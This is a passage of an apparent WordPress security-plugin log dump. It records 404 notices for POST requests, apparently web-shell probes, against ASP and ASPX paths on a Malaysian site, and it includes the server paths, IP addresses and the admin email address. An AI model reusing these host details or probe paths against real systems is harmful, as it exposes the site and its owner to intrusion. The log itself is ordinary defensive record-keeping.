Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.255.32.171\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.255.32.171\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/include/left.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/include/left.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Ujm1ncq3cUuJao9Ic2AAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/include/left.ashx\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"61783\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/include/left.ashx\";s:10:\"SCRIPT_URL\";s:18:\"/include/left.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Ujm1ncq3cUuJao9Ic2AAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656847.7073\";s:12:\"REQUEST_TIME\";s:10:\"1571656847\";}}','notice','2019-10-21 11:21:08','2019-10-21 11:20:49',35777456,37588640,'http://bintara.com.my//include/left.ashx',1,0,'121.255.32.171'),(28586,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//Images/login.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.207.248.49\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.207.248.49\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/Images/login.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/Images/login.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Ut21ncq3cUuJao9IdXQAAAI0\";s:12:\"REDIRECT_URL\";s:17:\"/Images/login.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"62643\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/Images/login.asp\";s:10:\"SCRIPT_URL\";s:17:\"/Images/login.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Ut21ncq3cUuJao9IdXQAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656889.6937\";s:12:\"REQUEST_TIME\";s:10:\"1571656889\";}}','notice','2019-10-21 11:21:49','2019-10-21 11:21:33',35344400,37146248,'http://bintara.com.my//Images/login.asp',1,0,'203.207.248.49'),(28587,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"//bdzad.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"824\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"203.110.171.249\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"203.110.171.249\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"http://bintara.com.my/bdzad.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/bdzad.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UxG1ncq3cUuJao9IddgAAAIg\";s:12:\"REDIRECT_URL\";s:10:\"/bdzad.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"62966\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"http://bintara.com.my/bdzad.asp\";s:10:\"SCRIPT_URL\";s:10:\"/bdzad.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UxG1ncq3cUuJao9IddgAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656905.6789\";s:12:\"REQUEST_TIME\";s:10:\"1571656905\";}}','notice','2019-10-21 11:21:58','2019-10-21 11:21:48',35343352,37127248,'http://bintara.com.my//bdzad.asp',1,0,'203.110.171.249'),(28588,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"//bdzad.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"689\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"159.226.228.23\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"159.226.228.23\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"http://bintara.com.my/bdzad.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/bdzad.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2Uy21ncq3cUuJao9IdhwAAAII\";s:12:\"REDIRECT_URL\";s:10:\"/bdzad.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"63174\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"http://bintara.com.my/bdzad.asp\";s:10:\"SCRIPT_URL\";s:10:\"/bdzad.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2Uy21ncq3cUuJao9IdhwAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571656908.865\";s:12:\"REQUEST_TIME\";s:10:\"1571656908\";}}','notice','2019-10-21 11:21:58','2019-10-21 11:21:52',35263880,37065280,'http://bintara.com.my//bdzad.asp',1,0,'159.226.228.23'),(28589,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//admin/dama.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.138.40.247\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.138.40.247\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/admin/dama.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/admin/dama.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VL@B6WkHPNakGAMKdFgAAAFI\";s:12:\"REDIRECT_URL\";s:15:\"/admin/dama.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"65403\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/admin/dama.asp\";s:10:\"SCRIPT_URL\";s:15:\"/admin/dama.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VL@B6WkHPNakGAMKdFgAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657010.9927\";s:12:\"REQUEST_TIME\";s:10:\"1571657010\";}}','notice','2019-10-21 11:23:34','2019-10-21 11:23:31',35342968,37150488,'http://bintara.com.my//admin/dama.asp',1,0,'61.138.40.247'),(28590,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//admin/dama.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"59.43.63.197\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"59.43.63.197\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/admin/dama.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/admin/dama.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VOeB6WkHPNakGAMKdIQAAAFA\";s:12:\"REDIRECT_URL\";s:15:\"/admin/dama.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"49280\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/admin/dama.asp\";s:10:\"SCRIPT_URL\";s:15:\"/admin/dama.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VOeB6WkHPNakGAMKdIQAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571657017.693\";s:12:\"REQUEST_TIME\";s:10:\"1571657017\";}}','notice','2019-10-21 11:23:40','2019-10-21 11:23:39',35266520,37066624,'http://bintara.com.my//admin/dama.asp',1,0,'59.43.63.197'),(28591,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//xsbkzk/commdd.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"125.254.186.56\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"125.254.186.56\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/xsbkzk/commdd.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/xsbkzk/commdd.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VPqAwEvHJaKWJ1hYifQAAAAg\";s:12:\"REDIRECT_URL\";s:18:\"/xsbkzk/commdd.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"49426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/xsbkzk/commdd.asp\";s:10:\"SCRIPT_URL\";s:18:\"/xsbkzk/commdd.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VPqAwEvHJaKWJ1hYifQAAAAg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571657023.387\";s:12:\"REQUEST_TIME\";s:10:\"1571657023\";}}','notice','2019-10-21 11:24:02','2019-10-21 11:23:43',35343392,37142464,'http://bintara.com.my//xsbkzk/commdd.asp',1,0,'125.254.186.56'),(28592,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//xsbkzk/commdd.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.75.64.205\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.75.64.205\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/xsbkzk/commdd.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/xsbkzk/commdd.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VRajZzpoQqaKQA3IeXQAAAME\";s:12:\"REDIRECT_URL\";s:18:\"/xsbkzk/commdd.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"49588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/xsbkzk/commdd.asp\";s:10:\"SCRIPT_URL\";s:18:\"/xsbkzk/commdd.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VRajZzpoQqaKQA3IeXQAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657036.6553\";s:12:\"REQUEST_TIME\";s:10:\"1571657036\";}}','notice','2019-10-21 11:24:16','2019-10-21 11:24:00',35269752,37073768,'http://bintara.com.my//xsbkzk/commdd.asp',1,0,'222.75.64.205'),(28593,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//CN/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.53.116.193\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.53.116.193\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/CN/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/CN/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2VVm1ncq3cUuJao9IeWwAAAIc\";s:12:\"REDIRECT_URL\";s:13:\"/CN/index.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"49936\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/CN/index.asp\";s:10:\"SCRIPT_URL\";s:13:\"/CN/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2VVm1ncq3cUuJao9IeWwAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571657048.2093\";s:12:\"REQUEST_TIME\";s:10:\"1571657048\";}}','notice','2019-10-21 11:24:26','2019-10-21 11:24:11',35267280,37068624,'http://bintara.com.my//CN/index.asp',1,0,'222.53.116.193'),(28594,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//bin/qiedu.AsPx\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 